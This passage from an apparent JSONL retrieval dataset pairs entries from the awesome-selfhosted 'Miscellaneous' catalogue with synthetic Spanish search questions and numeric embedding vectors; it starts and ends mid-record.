0.03381, -0.07403, -0.03286, -0.05124, -0.02451, 0.01539, -0.07183, 0.00858, 0.03623, 0.06462, -0.0271, 0.01913, -0.00137]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "con quΓ© puedo gestionar las claves secretas de forma segura?", "v": [0.04886, -0.05859, -0.1681, -0.04491, 0.09317, -0.13569, -0.12715, -0.10259, -0.08159, -0.0907, -0.05231, 0.05088, 0.00469, -0.09324, 0.13209, 0.0446, 0.12138, -0.09673, 0.00512, 0.046, 0.08385, -0.15859, 0.00579, -0.11215, -0.13777, -0.13904, 0.18662, 0.08553, -0.01708, -0.03777, -0.04453, 0.05802, 0.05644, -0.02929, -0.00368, 0.22698, -0.11194, 0.0376, 0.02832, -0.02597, -0.05661, 0.00861, -0.00477, 0.04509, 0.11534, 0.06461, -0.00981, -0.03583, 0.01301, -0.03846, -0.13093, -0.17073, -0.06841, -0.18475, -0.03869, -0.08593, 0.05089, -0.00291, 0.01244, -0.00978, -0.12582, 0.00284, -0.00257, 0.12635, 0.03562, -0.07048, 0.08336, -0.0416, -0.02788, 0.06081, 0.01273, -0.04012, 0.0128, 0.13862, 0.03579, -0.0189, 0.03083, 0.03342, -0.02038, 0.13335, -0.00422, 0.05046, -0.06317, -0.01644, -0.03912, -0.05643, 0.01206, -0.00317, -0.07967, -0.08042, 0.0784, -0.09501, 0.01842, 0.00112, -0.02051, 0.06002, -0.04073, -0.01058, -0.09118, -0.04107, -0.01013, 0.0421, -0.08699, 0.20574, -0.00075, 0.07247, -0.05905, -0.07673, 0.05987, -0.05594, -0.00771, 0.03997, -0.0528, -0.01178, -0.02785, 0.08667, -0.0068, 0.03083, 0.02262, 0.00636, -0.09303, -0.04666, -0.00269, 0.01887, 0.08219, -0.00175, -0.02402, 0.08735, 0.01642, -0.02619, -0.11925, -0.0021, -0.04932, 0.0394, 0.05725, 0.03568, -0.04624, -0.04491, -0.06317, -0.06174, -0.01012, -0.01788, 0.02762, -0.02718, 0.08809, -0.07813, 0.03482, 0.01114, -0.02488, 0.03551, 0.01893, 0.005, 0.03023, 0.03003, -0.01092, 0.01819, -0.03243, -0.0585, -0.04457, 0.09344, -0.02298, 0.03455, -0.09829, 0.04299, 0.02684, -0.05918, -0.04136, -0.01548, -0.05485, 0.02249, 0.02384, 0.00378, 0.01649, -0.02837, 0.00263, -0.04372, -0.03631, -0.11295, 0.01105, -0.04264, -0.0258, 0.03201, -0.01981, 0.0951, -0.00846, -0.04135, 0.01915, 0.02946, -0.05136, 0.05976, 0.04776, 0.03059, -0.0216, 0.02925, -0.01394, -0.04439, -0.0081, -0.01875, 0.00247, -0.02434, -0.02871, -0.03435, 0.0516, -0.02653, 0.05178, -0.00144, -0.09229, 0.05371, 0.02983, 0.0189, 0.09901, -0.02322, 0.03656, -0.05675, -0.01753, -0.01901, -0.0588, 0.03452, -0.02793, 0.0142, 0.00897, 0.03423, 0.06472, -0.01643, 0.03165, -0.00813, 0.013, 0.04334, 0.04527, 0.04532, -0.00575, 0.05205, -0.01916, 0.02607, 0.04761, -0.02257, -0.00923, -0.04829, -0.02428, -0.01704, -0.02421, 0.05966, 0.00215, -0.07969, -0.01654, -0.03582, -0.10456, 0.08627, -0.00473, -0.04676, -0.00596, -0.03203, 0.00627, -0.01486, 0.01234, -0.06214]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "cual es un programa que bloquee los anuncios en youtube usando docker?", "v": [0.11934, -0.05119, -0.14132, -0.0587, -0.03146, -0.10771, 0.06219, 0.01524, -0.09598, -0.1682, -0.10988, -0.17239, -0.07931, -0.12533, -0.09268, -0.13632, 0.0566, -0.12801, 0.07188, -0.03028, 0.03936, -0.01307, -0.00636, -0.00656, -0.01254, -0.10112, -0.0889, -0.00028, -0.13385, -0.10238, -0.00025, -0.08632, 0.02561, -0.02966, 0.013, -0.04243, 0.05164, -0.04165, 0.06233, 0.08015, -0.00427, -0.0717, -0.17584, 0.01275, -0.0879, 0.06226, 0.11896, -0.05916, 0.08351, -0.05718, -0.05684, 0.0234, -0.07977, 0.10738, 0.04064, 0.00195, 0.11491, -0.08358, -0.03801, 0.03139, -0.07105, -0.03555, 0.0473, -0.14088, 0.03935, 0.00256, 0.11632, 0.10234, -0.02615, 0.05927, -0.01712, 0.07416, 0.08946, -0.00685, 0.09579, 0.12366, -0.02271, 0.04824, -0.04409, -0.02985, -0.02065, -0.05829, 0.02931, 0.17877, -0.00463, 0.00878, 0.01253, -0.04628, -0.05528, -0.12374, 0.04865, 0.12869, -0.01339, 0.06542, 0.10154, -0.06449, 0.09154, 0.12428, -3e-05, -0.10054, 0.06197, -0.013, -0.07024, 0.12008, 0.0324, 0.1423, 0.06126, -0.16362, -0.01661, 0.00406, -0.03226, 0.00229, -0.00221, -0.08336, -0.07071, 0.02445, -0.06612, -0.02076, 0.05808, -0.08779, 0.00804, 0.00341, -0.09047, -0.0031, 0.099, -0.00495, 0.00481, 0.03758, -0.04371, 0.044, 0.02769, 0.0003, -0.07228, -0.06427, -0.06395, -0.0142, 0.0324, -0.03823, -0.04357, -0.06165, 0.05954, -0.0036, 0.07353, -0.00164, 0.02704, 0.01225, -0.00587, -0.09469, -0.06935, 0.07217, 0.02445, 0.02706, -0.03022, -0.01019, -0.09774, -0.03919, -0.05202, -0.06735, -0.01397, 0.09153, -0.04846, -0.02577, -0.0727, -0.02699, 0.0242, 0.02803, 0.00205, 0.00363, -0.01335, 0.05819, 0.02511, 0.01579, 0.06182, -0.07539, -0.02007, -0.06103, 0.03025, -0.05086, -0.0023, -0.00513, -0.07019, 0.00556, 0.05361, 0.02461, -0.00225, -0.02738, -0.03011, 0.03931, 0.03635, 0.05654, -0.03041, 0.0405, -0.01624, -0.05803, 0.01124, -0.07204, -0.07674, -0.06995, 0.04705, 0.03707, -0.05555, -0.01249, -0.01105, -0.0147, -0.0504, 0.07868, -0.06002, 0.02491, 0.0457, 0.04984, 0.03392, -0.04117, -0.01989, -0.02592, -0.03451, -0.02194, 0.05118, 0.01985, 0.0199, 0.00251, 0.03175, 0.03026, 0.02588, 0.00745, -0.02593, -0.02833, 0.01748, -0.00663, -0.00323, 0.04679, -0.0814, -0.03252, -0.0216, 0.02832, 0.04041, 0.04777, 0.02032, 0.00322, -0.01086, -0.07011, -0.00227, 0.0405, -0.00593, -0.05975, -0.00708, -0.0112, -0.07599, 0.04181, 0.01664, -0.01983, 0.00359, 0.04917, 0.00832, -0.06198, 0.04937, 0.03265]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "quΓ© herramienta sirve para revisar ortografΓ­a en mΓ‘s de veinte idiomas?", "v": [0.13275, 0.03994, -0.12372, -0.04456, 0.10363, -0.11643, -0.0412, -0.12068, -0.01533, -0.10895, 0.00385, -0.09329, 0.07656, -0.04353, 0.13187, 0.0722, 0.14599, -0.0675, 0.00581, -0.05529, -0.01323, -0.10554, -0.07031, 0.04778, -0.16129, -0.01934, 0.02348, -0.03433, -0.01894, 0.03613, -0.08842, 0.05575, 0.07664, -0.09084, -0.17427, 0.02927, -0.01427, 0.01235, -0.02035, 0.05896, 0.09077, 0.13217, -0.00506, 0.09961, -0.07408, 0.03228, -0.01751, 0.12559, -0.00364, 0.01473, 0.03568, -0.07594, -0.02294, 0.04092, -0.04111, -0.03164, 0.20668, -0.07627, -0.04173, -0.1345, -0.0225, 0.07693, 0.02366, -0.02843, 0.06206, -0.0566, -0.00434, -0.04889, 0.01318, 0.01294, -0.0402, 0.05671, 0.00955, 0.06079, -0.08273, -0.06172, 0.00855, 0.03243, 0.08592, -0.00886, 0.09374, -0.02772, -0.08091, -0.02611, -0.06776, -0.11819, 0.0112, -0.04327, -0.0249, -0.06387, -0.07649, 0.09375, -0.00594, -0.16464, -0.10257, 0.00294, 0.03422, -0.1496, 0.01544, -0.01632, 0.17621, -0.08709, -0.04231, 0.03364, -0.09151, -0.02474, -0.04844, -0.05373, -0.06439, 0.0614, 0.12137, 0.06231, -0.02218, -0.02787, -0.03988, -0.0485, 0.02041, 0.05523, 0.03957, -0.03857, 0.01528, 0.02442, -0.05925, 0.0218, 0.04209, 0.04054, 0.04629, 0.09556, 0.05835, -0.01303, -0.00302, -0.08779, -0.00288, -0.04216, -0.01701, -0.02127, 0.03379, -0.11091, 0.00575, -0.01768, -0.07752, 0.08157, -0.05301, 0.02229, 0.01336, 0.06474, 0.13842, -0.00956, -0.07541, -0.04349, -0.03527, -0.06901, 0.06886, 0.05601, -0.02109, -0.03951, -0.00084, -0.00238, -0.11931, 0.02487, -0.00276, -0.09727, 0.03837, 0.00634, 0.01825, -0.01754, -0.03768, 0.03856, 0.14177, -0.06966, 0.03832, -0.0151, 0.08347, 0.02176, -0.02809, 0.00443, 0.02581, 0.0699, 0.01749, -0.05895, -0.08558, -0.0608, -0.12906, -0.03083, 0.0418, -0.03957, 0.05394, -0.00355, -0.03888, -0.04951, -0.00072, 0.02726, -0.06536, -0.10444, -0.00352, -0.00282, -0.06242, 0.01024, 0.01303, -0.1007, -0.03318, 0.00979, -0.00541, -0.00889, 0.03743, 0.08785, -0.02216, -0.05344, -0.04349, 0.04777, 0.02895, -0.00766, -0.0526, 0.02752, 0.05306, -0.03472, -0.04149, 0.04016, 0.01469, -0.03143, 0.05232, -0.04056, 0.03251, -0.02932, -0.02825, -0.00531, 0.02177, -0.00389, 0.04244, 0.07124, -0.00305, 0.01583, -0.01743, -0.02295, 0.04164, -0.0624, 0.01151, 0.06236, -0.00059, -0.03127, -0.0167, -0.0202, -0.05275, -0.0301, -0.06785, -0.04345, 0.04098, -0.03793, -0.01333, -0.0153, -0.00925, 0.05289, 0.02885, -0.08121, 0.03316, -0.03802]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "cuΓ‘l es una alternativa libre a los servicios de traducciΓ³n automΓ‘tica?", "v": [0.13488, 0.10818, -0.00111, -0.02845, -0.01687, -0.03688, 0.01836, -0.08867, -0.23825, 0.03756, -0.16775, -0.23589, 0.05245, 0.06592, 0.08172, -0.04273, 0.07963, -0.11737, 0.10145, 0.03371, -0.01204, -0.12694, -0.051, -0.13795, -0.07186, -0.12418, 0.04157, -0.01038, -0.13061, 0.04717, 0.01872, -0.01045, 0.08486, -0.00861, 0.01275, 0.00795, 0.11941, 0.11519, 0.10748, -0.06905, 0.05573, -0.12251, -0.0007, 0.07806, -0.03248, -0.05648, 0.01696, 0.06036, -0.01835, -0.0053, 0.00668, -0.04754, -0.06448, -0.03402, 0.04217, -0.07566, 0.15904, -0.06725, -0.05082, -0.0819, 0.01519, 0.10049, -0.0062, 0.04531, 0.09349, 0.00208, -0.03776, -0.04202, 0.01332, 0.05898, 0.03452, -0.04195, -0.01407, -0.05912, -0.0814, 0.03353, -0.10342, -0.02823, -0.02421, 0.07465, 0.09422, -0.07053, -0.02799, 0.01559, 0.06389, -0.06153, 0.03368, -0.11267, 0.08097, -0.00938, 0.05068, -0.06358, 0.041, 0.0507, -0.0263, 0.00826, -0.02871, -0.03065, -0.03035, 0.02625, 0.11179, -0.02619, -0.00531, 0.04667, -0.02706, 0.00797, -0.01312, 0.0231, -0.08676, 0.01356, 0.08297, 0.03349, -0.02689, -0.06948, -0.02229, 0.00137, 0.01154, 0.08705, 0.01084, 0.0832, -0.00592, -0.0204, 0.03891, -0.0827, 0.05668, 0.01443, 0.03141, 0.08677, 0.00803, 0.00667, 0.03547, -0.06632, -0.11594, -0.11574, -0.05719, -0.01233, 0.06972, -0.00401, 0.04994, -0.02758, -0.07484, -0.00762, -0.01668, 0.02845, 0.05171, -0.06943, 0.07877, -0.03628, 0.05084, 0.0092, -0.09343, -0.00994, 0.01983, 0.1408, -0.00104, 0.0313, -0.04716, -0.06303, -0.06203, 0.11995, 0.07471, -0.07637, 0.06264, 0.00781, -0.0479, 0.05792, -0.00392, -0.06892, -0.02385, -0.00023, -0.01307, 0.06034, 0.0368, -0.0841, 0.0014, 0.0133, 0.01305, -0.01891, 0.06633, -0.08062, -0.0111, 0.03055, -0.10917, -0.03737, 0.01989, -0.0279, 0.02967, -0.02585, -0.02402, 0.00437, -0.04934, 0.01811, -0.0911, -0.10365, -0.01086, -0.0536, -0.04349, -0.03168, -0.09423, -0.06175, -0.12229, -0.04676, 0.02606, -0.00995, -0.05343, 0.04106, 0.01421, 0.08088, -0.01005, 0.11239, -0.01365, 0.03278, 0.09657, 0.00297, -0.01779, -0.00104, -0.01104, -0.05395, 0.00664, -0.03796, 0.00894, -9e-05, 0.0084, -0.02117, -0.03688, 0.03768, 0.09573, 0.0756, -0.02066, -0.00517, -0.03938, 0.09734, 0.01321, 0.01713, 0.04249, -0.06524, -0.01202, 0.01503, -0.03081, -0.08789, 0.04312, 0.07407, -0.03448, 0.00883, -0.07324, -0.00435, -0.04844, -0.01324, -0.02296, -0.03143, -0.02682, 0.06564, -0.00312, -0.01463, 0.03841, 0.02751]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: LanguageTool β€” Proofread more than 20 languages. It finds many errors that a simple spell checker cannot detect [LGPL-2.1, Java/Docker]. Libre Translate β€” Machine Translation API [AGPL-3.0, Docker/Python]. LubeLogger β€” Web-based vehicle maintenance and fuel mileage tracker [MIT, Docker/K8S/C#]. Mirumoji β€” Japanese immersion toolkit providing clickable, tokenized subtitles with dictionary lookups and transcription generation [MIT, Docker/Python]. mosparo β€” The modern spam protection tool. It replaces other captcha methods with a simple and easy to use spam protection solution [MIT, PHP]. Movary β€” Web app to track and rate your watched movies [⚠, MIT, Docker/PHP]. Neko β€” Virtual browser that runs in docker and uses WebRTC [Apache-2.0, Docker/Go]. OmniTools β€” Collection of powerful web-based tools for everyday tasks (coding, manipulating images/videos, PDFs or crunching numbers...) [MIT, Docker]. Open-Meteo β€” Weather API with open-data forecasts, historical and climate data from all major national weather services [AGPL-3.0, Docker].", "indexar": "con quΓ© puedo montar un sistema para rastrear el mantenimiento y el consumo de combustible de mi vehΓ­culo?", "v": [0.04388, 0.02495, -0.12012, -0.16672, -0.08242, 0.02836, -0.09045, 0.02084, -0.05127, -0.1236, -0.14079, -0.06568, 0.01859, 0.09216, 0.04029, 0.06505, -0.04516, -0.0774, -0.08426, 0.01016, -0.04845, -0.16196, 0.02962, 0.06023, -0.03121, 0.18446, 0.01395, -0.11419, -0.30772, 0.02002, 0.05412, 0.0813, 0.07557, 0.01655, -0.1518, -0.07457, 0.07616, 0.00249, 0.08846, -0.11741, 0.02769, -0.10016, 0.03113, 0.07851, 0.04631, -0.02425, -0.02605, -0.113, -0.05527, -0.03471, 0.05071, 0.10997, -0.0825, -0.03193, 0.05915, 0.03916, 0.04913, -0.10533, 0.0751, -0.04117, 0.02483, -0.05607, 0.01252, 0.06533, -0.01109, -0.02055, 0.04286, -0.01598, -0.06943, -0.03774, 0.02517, -0.09338, 0.09357, -0.05068, 0.00905, 0.01097, 0.07315, 0.1104, 0.08826, 0.05926, 0.01224, 0.00801, -0.09337, 0.04795, 0.05814, 0.01645, 0.1117, -0.06927, 0.00426, 0.06929, -0.03429, -0.04541, 0.06241, 0.12728, -0.08959, 0.04311, 0.03566, 0.09482, -0.06787, 0.01731, 0.01715, -0.08572, 0.02659, 0.11007, 0.04729, -0.10576, 0.10223, -0.07772, 0.08244, -0.02511, 0.06282, 0.06235, -0.05378, -0.07022, 0.00857, -0.00232, -0.01839, 0.06431, -0.06967, -0.08052, -0.08148, 0.12003, 0.0397, 0.03048, 0.12402, -0.04404, 0.04264, 0.08139, 0.01551, 0.00638, 0.03219, -0.03998, -0.03437, -0.03866, 0.00904, -0.02387, -0.05468, 0.06196, -0.01281, 0.05686, 0.09574, 0.00292, -0.00953, -0.11437, 0.06778, -0.00409, 0.02004, -0.07474, 0.04482, -0.05569, -0.06056, -0.02626, 0.04639, -0.03089, -0.00532, -0.01247, 0.07958, -0.00545, 0.05468, -0.07419, 0.01176, -0.08742, 0.02027, 0.06281, -0.01547, 0.05681, -0.05117, -0.02492, 0.06657, -0.06003, 0.05345, 0.00191, 0.05468, -0.0432, 0.12578, 0.02988, 0.00901, -0.05514, -0.02808, 0.01851, -0.08286, -0.04726, -0.06966, 0.09196, -0.01965, 0.01825, -0.01875, 0.00036, -0.01548, -0.04717, -0.02709, -0.02196, 0.06763, 0.02255, 0.02733, 0.03271, -0.00836, -0.02405, 0.04186, -0.00582, -0.04776, 0.00728, -0.02085, -0.00863, 0.01139, -0.08408, 0.00597, 0.03079, 0.03561, 0.00535, 0.01984, 0.01794, 0.09624, -0.03933, -0.06751, 0.01314, -0.01172, 0.03736, -0.00756, 0.00947, 0.07474, -0.01133, 0.04959, -0.00667, -0.00284, 0.01266, -0.03318, -0.00593, -0.01585, -0.0021, -0.03701, -0.04846, -0.02652, 0.02156, 0.00381, 0.01359, -0.03333, -0.01604, -0.02289, 0.00896, 0.04092, 0.09443, 0.05783, -0.05447, -0.0049, -0.00897, -0.03201, 0.00615, 0.04282, -0.03297, 0.00996, -0.01945, 0.01412, -0.05751, 0.01617, -0.01123]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "que programa puedo usar para convertir documentos de texto a voz en casa?", "v": [-0.07449, 0.04361, -0.12546, -0.1336, 0.01896, -0.02551, 0.03513, -0.13378, -0.01277, -0.15535, -0.17095, -0.14563, -0.0012, -0.06232, -0.06377, -0.02322, 0.21922, -0.03935, 0.01359, 0.01346, 0.0877, -0.10015, -0.08695, -0.03358, -0.02943, 0.02805, 0.07338, -0.09518, -0.00281, -0.00583, -0.05115, -0.03777, 0.05396, -0.06735, -0.0573, 0.03795, 0.01389, 0.04291, 0.02165, 0.10587, 0.09493, 0.14384, -0.05804, 0.07636, -0.04686, -0.01451, 0.05064, 0.03779, -0.11145, -0.07349, -0.02939, -0.12969, -0.02318, 0.08783, -0.08578, -0.10178, 0.13894, -0.1583, -0.021, -0.0024, 0.00804, -0.00986, 0.02392, 0.00895, -0.00295, -0.00945, 0.04324, 0.00554, -0.03846, 0.01228, -0.04883, 0.06445, 0.08508, 0.00967, -0.04181, -0.02421, -0.1051, -0.18818, 0.01371, 0.06926, 0.02171, -0.03492, -0.05923, 0.04006, -0.01319, -0.07504, 0.04407, -0.04853, 0.15724, -0.03632, -0.07014, 0.02616, 0.08271, 0.03961, 0.06306, -0.07821, 0.09771, 0.02137, -0.02536, 0.00624, 0.08995, -0.03485, 0.0042, 0.09197, -0.02778, -0.00163, -0.00198, -0.0495, -0.03252, 0.01017, -0.0182, 0.06388, -0.10428, 0.07184, -0.0287, 0.03372, 0.03459, -0.0486, -0.00245, -0.1275, -0.03981, 0.06511, -0.01055, -0.0171, 0.04246, -0.08508, 0.07982, 0.04626, -0.08419, 0.10941, 0.00272, -0.01152, -0.04987, -0.12244, 0.04543, -0.04753, -0.03168, -0.03724, -0.00073, -0.05641, -0.03801, 0.04264, -0.03656, -0.00682, 0.04604, -0.00043, -0.05926, -0.01388, -0.04709, -0.0396, -0.01545, -0.02268, -0.03429, 0.02715, -0.0063, -0.01097, 0.09209, 0.00388, -0.13787, -0.04333, -0.06195, 0.02264, -0.07769, -0.05641, 0.04069, 0.00409, -0.00598, 0.04958, 0.0198, 0.03858, -0.01553, 0.01983, 0.08548, -0.04761, -0.00625, -0.00809, -0.01395, 0.04132, -0.04667, -0.05704, -0.07367, 0.05343, -0.01482, -0.01406, 0.03593, 0.06607, 0.0485, 0.00617, -0.02922, -0.10891, -0.1312, 0.04294, 0.00478, -0.0006, -0.0257, -0.03165, -0.0662, -0.02059, 0.04997, -0.07548, -0.09166, -0.05838, 0.02538, 0.00107, 0.09454, 0.07972, -0.06832, -0.03201, 0.02861, 0.1252, -0.01052, -0.05164, 0.04825, 0.0884, -0.03462, 0.00984, -0.07658, 0.03803, 0.0722, 0.06517, 0.09144, -0.00667, 0.00476, -0.00271, 0.05418, -0.05788, 0.01983, -0.0354, 0.00044, 0.02774, -0.02725, -0.03787, 0.03366, 0.01753, -0.02417, 0.02493, -0.05282, -0.03906, -0.04111, -0.08208, -0.02792, 0.09804, -0.01611, 0.0108, -0.03316, 0.0503, -0.07044, 0.03914, 0.06472, 0.00962, -0.01104, 0.00749, 0.06866, -0.03619, 0.05529, -0.00309]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "con quΓ© herramienta puedo crear un resumen automΓ‘tico de mis archivos PDF y DOCX?", "v": [0.06278, 0.05518, -0.04941, -0.1544, 0.05378, -0.05711, 0.01436, -0.02065, -0.15763, -0.04698, -0.13876, -0.13893, -0.04088, -0.20054, 0.05343, -0.04317, 0.22031, -0.08045, -0.09633, 0.01492, 0.04624, -0.1075, -0.04635, -0.08099, 0.03351, -0.07201, 0.01215, 0.0441, -0.2236, 0.03073, 0.03312, 0.07535, 0.05919, -0.04368, -0.09839, 0.0414, 0.02663, 0.13526, -0.0375, 0.06743, -0.00322, 0.10056, -0.174, 0.18321, -0.00932, 0.01346, -0.0054, 0.09776, -0.11544, 0.00829, 0.03811, -0.12536, -0.06839, 0.07824, -0.05517, -0.10858, 0.16566, -0.14964, 0.08463, -0.11288, -0.00864, 0.11992, -0.03268, -0.0549, -0.10319, -0.05342, -0.03056, -0.02869, -0.04951, 0.1002, -0.01069, 0.03183, 0.10174, -0.04779, -0.00985, 0.02568, -0.06467, -0.02692, -0.08856, 0.04897, 0.1071, -0.09217, -0.0789, -0.04737, -0.00982, -0.12921, 0.06356, 0.00226, 0.02697, -0.10741, 0.04657, -0.03787, 0.06496, 0.07163, 0.03939, -0.01176, 0.07662, -0.08985, -0.06812, -0.04362, 0.04377, -0.02181, -0.06159, 0.06589, 0.03072, 0.04118, -0.01974, 0.0361, -0.03826, 0.02617, 0.05769, -0.00923, -0.01999, -0.02134, -0.06473, 0.02382, 0.01548, -0.01694, -0.02596, -0.06596, 0.01684, 0.00851, -0.07574, -0.01078, -0.02563, -0.0472, 0.00762, 0.12185, -0.01224, -0.03723, 0.11267, 0.00362, -0.12712, -0.02422, 0.01431, -0.01812, 0.02638, -0.02004, -0.10418, -0.0995, 0.03814, -0.05362, 0.03463, -0.049, -0.02413, -0.03516, 0.00535, -0.0325, 2e-05, -0.03482, -0.03002, -0.04273, 0.04763, -0.00403, -0.05631, 0.01135, 0.00839, -0.01433, -0.01118, 0.02545, -0.03847, -0.02093, 0.04073, -0.03186, -0.01302, -0.0489, 0.02913, -0.02276, 0.07383, 0.01716, 0.00074, -0.01118, 0.02141, -0.09616, -0.01386, -0.07201, -0.00438, -0.01507, 0.07408, -0.05622, -0.01452, -0.05303, 0.00864, 0.00744, -0.0343, -0.07804, 0.03451, -0.02713, 0.0216, 0.03598, -0.05654, 0.06068, -0.00015, -0.07182, 0.03678, -0.04577, -0.01678, 0.01368, 0.04008, -0.05215, -0.00022, 